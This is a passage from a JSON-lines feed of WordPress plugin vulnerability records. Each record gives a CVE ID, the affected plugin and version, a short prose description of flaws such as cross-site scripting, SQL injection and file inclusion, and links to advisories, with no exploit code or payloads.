string.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2957322\\\/fv-wordpress-flowplayer#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2957322\\\/fv-wordpress-flowplayer#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fv-wordpress-flowplayer\\\/tags\\\/7.5.36.7212\\\/models\\\/custom-videos.php#L341\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fv-wordpress-flowplayer\\\/tags\\\/7.5.36.7212\\\/models\\\/custom-videos.php#L341\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c55ca7d4-6bc0-49c9-8ce0-50fff8775a76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c55ca7d4-6bc0-49c9-8ce0-50fff8775a76?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1761","slug":"wp-whatsapp","versionImpact":"3.6.1","description":"The WP Chat App plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget\/block in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping on user supplied attributes such as 'buttonColor' and 'phoneNumber'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85a94f32-e1e5-48ea-822e-c54d0592da28?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85a94f32-e1e5-48ea-822e-c54d0592da28?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3044368%40wp-whatsapp%2Ftrunk&old=3029885%40wp-whatsapp%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3044368%40wp-whatsapp%2Ftrunk&old=3029885%40wp-whatsapp%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1697","slug":"add-fields-to-checkout-page-woocommerce","versionImpact":"1.3.1","description":"The Custom WooCommerce Checkout Fields Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the save_wcfe_options function in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a92f44b-6f2b-439c-8245-ace189740425?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a92f44b-6f2b-439c-8245-ace189740425?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-fields-to-checkout-page-woocommerce\\\/tags\\\/1.2.9\\\/classes\\\/class-wc-checkout-field-editor.php#L1775\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-fields-to-checkout-page-woocommerce\\\/tags\\\/1.2.9\\\/classes\\\/class-wc-checkout-field-editor.php#L1775\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-fields-to-checkout-page-woocommerce\\\/tags\\\/1.3.2\\\/classes\\\/class-wc-checkout-field-editor.php#L1788\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-fields-to-checkout-page-woocommerce\\\/tags\\\/1.3.2\\\/classes\\\/class-wc-checkout-field-editor.php#L1788\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3559","slug":"custom-field-suite","versionImpact":"2.6.7","description":"The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the the 'cfs[post_content]' parameter versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56d8af3b-6c00-49ed-872a-64f7bebb470b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56d8af3b-6c00-49ed-872a-64f7bebb470b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-field-suite\\\/trunk\\\/includes\\\/form.php#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-field-suite\\\/trunk\\\/includes\\\/form.php#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-field-suite\\\/trunk\\\/includes\\\/api.php#L282\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-field-suite\\\/trunk\\\/includes\\\/api.php#L282\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2385","slug":"addons-for-elementor","versionImpact":"8.3.7","description":"The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 8.3.7 via several of the plugin's widgets through the 'style' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0aa3ec9b-80d5-4e31-8045-43c8d151cab8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0aa3ec9b-80d5-4e31-8045-43c8d151cab8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.5\\\/includes\\\/helper-functions.php#L726\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.5\\\/includes\\\/helper-functions.php#L726\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.5\\\/includes\\\/widgets\\\/heading.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.5\\\/includes\\\/widgets\\\/heading.php#L267\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6870","slug":"responsive-lightbox","versionImpact":"2.4.7","description":"The Responsive Lightbox & Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 2.4.7 due to insufficient input sanitization and output escaping affecting the rl_upload_image AJAX endpoint. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the 3gp2 file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4d55309-d178-4b3d-9de6-2cf2769b76fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4d55309-d178-4b3d-9de6-2cf2769b76fe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-lightbox\\\/tags\\\/2.4.7\\\/includes\\\/class-remote-library.php#L261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-lightbox\\\/tags\\\/2.4.7\\\/includes\\\/class-remote-library.php#L261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-lightbox\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-lightbox\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3137531%40responsive-lightbox&new=3137531%40responsive-lightbox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3137531%40responsive-lightbox&new=3137531%40responsive-lightbox&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9068","slug":"oneelements-ultimate-addons-for-elementor","versionImpact":"1.3.7","description":"The OneElements \u2013 Best Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f83a514-2b42-4348-9525-438205daeeab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f83a514-2b42-4348-9525-438205daeeab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/oneelements-ultimate-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/oneelements-ultimate-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9376","slug":"kata-plus","versionImpact":"1.4.7","description":"The Kata Plus \u2013 Addons for Elementor \u2013 Widgets, Extensions and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05c7267e-2e0c-48e9-bdaa-c8bc0b9ec8a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05c7267e-2e0c-48e9-bdaa-c8bc0b9ec8a6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kata-plus\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kata-plus\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174359\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174359\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/climaxthemes.com\\\/kata\\\/documentation\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/climaxthemes.com\\\/kata\\\/documentation\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12165","slug":"cf7-mollie","versionImpact":"5.0.0","description":"The Mollie for Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 5.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-mollie\\\/trunk\\\/includes\\\/php\\\/admin_menu.php#L164\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-mollie\\\/trunk\\\/includes\\\/php\\\/admin_menu.php#L164\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5a21b3a-a60f-4083-a474-ec9fedd9b8cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5a21b3a-a60f-4083-a474-ec9fedd9b8cb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11906","slug":"tpg-get-posts","versionImpact":"3.6.5","description":"The TPG Get Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tpg_get_posts' shortcode in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tpg-get-posts\\\/trunk\\\/inc\\\/class-tpg-gp-process.php#L478\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tpg-get-posts\\\/trunk\\\/inc\\\/class-tpg-gp-process.php#L478\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tpg-get-posts\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tpg-get-posts\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c22288e6-76f3-4c5a-bd7b-30681334bab7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c22288e6-76f3-4c5a-bd7b-30681334bab7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22336","slug":"wizhi-multi-filters","versionImpact":"1.8.6","description":"Cross-Site Request Forgery (CSRF) vulnerability in WordPress ?? Wizhi Multi Filters by Wenprise allows Stored XSS.This issue affects Wizhi Multi Filters by Wenprise: from n\/a through 1.8.6.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wizhi-multi-filters\\\/vulnerability\\\/wordpress-wizhi-multi-filters-by-wenprise-plugin-1-8-6-csrf-to-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wizhi-multi-filters\\\/vulnerability\\\/wordpress-wizhi-multi-filters-by-wenprise-plugin-1-8-6-csrf-to-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13340","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3.6","description":"The MDTF \u2013 Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mdf_results_by_ajax' shortcode in all versions up to, and including, 1.3.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224186%40wp-meta-data-filter-and-taxonomy-filter&new=3224186%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224186%40wp-meta-data-filter-and-taxonomy-filter&new=3224186%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226055%40wp-meta-data-filter-and-taxonomy-filter&new=3226055%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226055%40wp-meta-data-filter-and-taxonomy-filter&new=3226055%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-meta-data-filter-and-taxonomy-filter\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-meta-data-filter-and-taxonomy-filter\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcaeae5b-4047-4f09-8197-6ce2c21cc812?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcaeae5b-4047-4f09-8197-6ce2c21cc812?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13492","slug":"guten-free-options","versionImpact":"0.9.5","description":"The Guten Free Options WordPress plugin through 0.9.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a4a75b75-4801-4ed4-bcc6-4874ac169562\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a4a75b75-4801-4ed4-bcc6-4874ac169562\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13844","slug":"post-smtp","versionImpact":"3.1.2","description":"The Post SMTP plugin for WordPress is vulnerable to generic SQL Injection via the \u2018columns\u2019 parameter in all versions up to, and including, 3.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/nhienit2010\\\/d4692062f54b89e16aa068a0ef142cf6#file-postmanemailquerylog-php-L314\",\"name\":\"https:\\\/\\\/gist.github.com\\\/nhienit2010\\\/d4692062f54b89e16aa068a0ef142cf6#file-postmanemailquerylog-php-L314\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249371\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249371\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-smtp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-smtp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0540f70d-009a-4776-8717-f096e30a11d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0540f70d-009a-4776-8717-f096e30a11d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2803","slug":"so-called-air-quotes","versionImpact":"0.1","description":"The So-Called Air Quotes plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 0.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/so-called-air-quotes\\\/trunk\\\/airquote.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/so-called-air-quotes\\\/trunk\\\/airquote.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/so-called-air-quotes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/so-called-air-quotes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83f2ceee-4422-4ed5-adc7-91bc022ae42d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83f2ceee-4422-4ed5-adc7-91bc022ae42d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2105","slug":"jupiterx-core","versionImpact":"4.8.11","description":"The Jupiter X Core plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.8.11 via deserialization of untrusted input from the 'file' parameter of the 'raven_download_file' function. This makes it possible for attackers to inject a PHP Object through a PHAR file. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. This vulnerability may be exploited by unauthenticated attackers when a form is present on the site with the file download action, and the ability to upload files is also present. Otherwise, this would be considered exploitable by Contributor-level users and above, because they could create the form needed to successfully exploit this.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279676\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279676\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/utils.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jupiterx-core\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jupiterx-core\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3427387e-30d2-40a5-9bfd-d458039d8e2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3427387e-30d2-40a5-9bfd-d458039d8e2e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5019","slug":"hive-support","versionImpact":"1.2.2","description":"The Hive Support | AI-Powered Help Desk, Live Chat & AI Chat Bot Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing or incorrect nonce validation on the hs_update_ai_chat_settings() function. This makes it possible for unauthenticated attackers to reconfigure the plugin\u2019s AI\/chat settings (including API keys) and to potentially redirect notifications or leak data to attacker-controlled endpoints via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hive-support\\\/tags\\\/1.2.4\\\/backend\\\/class-hive-support-chat-ajax.php#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hive-support\\\/tags\\\/1.2.4\\\/backend\\\/class-hive-support-chat-ajax.php#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hive-support\\\/tags\\\/1.2.4\\\/backend\\\/class-hive-support-chat-ajax.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hive-support\\\/tags\\\/1.2.4\\\/backend\\\/class-hive-support-chat-ajax.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hive-support\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hive-support\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50542e5e-da66-4223-a6bf-dc9381687ddd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50542e5e-da66-4223-a6bf-dc9381687ddd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8314","slug":"software-issue-manager","versionImpact":"5.0.1","description":"The Software Issue Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018noaccess_msg parameter in all versions up to, and including, 5.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/software-issue-manager\\\/tags\\\/5.0.0\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/software-issue-manager\\\/tags\\\/5.0.0\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341018\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341018\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/software-issue-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/software-issue-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ef87ab8-d56b-4d3a-b4fc-6c17c24143ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ef87ab8-d56b-4d3a-b4fc-6c17c24143ec?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4750","slug":"wp-responsive-testimonials-slider-and-widget","versionImpact":"1.5","description":"The WP Responsive Testimonials Slider And Widget WordPress plugin through 1.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7bdc1324-8d08-4185-971f-8d49367702cf\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7bdc1324-8d08-4185-971f-8d49367702cf\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4372","slug":"wc-dynamic-pricing-and-discounts","versionImpact":"2.4.1","description":"The WooCommerce Dynamic Pricing and Discounts plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.4.1. This is due to missing sanitization on the settings imported via the import() function. This makes it possible for unauthenticated attackers to import a settings file containing malicious JavaScript that would execute when an administrator accesses the settings area of the site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcaa5d0e-b764-4566-bd46-2d41dc391c36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcaa5d0e-b764-4566-bd46-2d41dc391c36?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/woocommerce-dynamic-pricing-and-discounts-plugin-fixed-multiple-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/woocommerce-dynamic-pricing-and-discounts-plugin-fixed-multiple-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
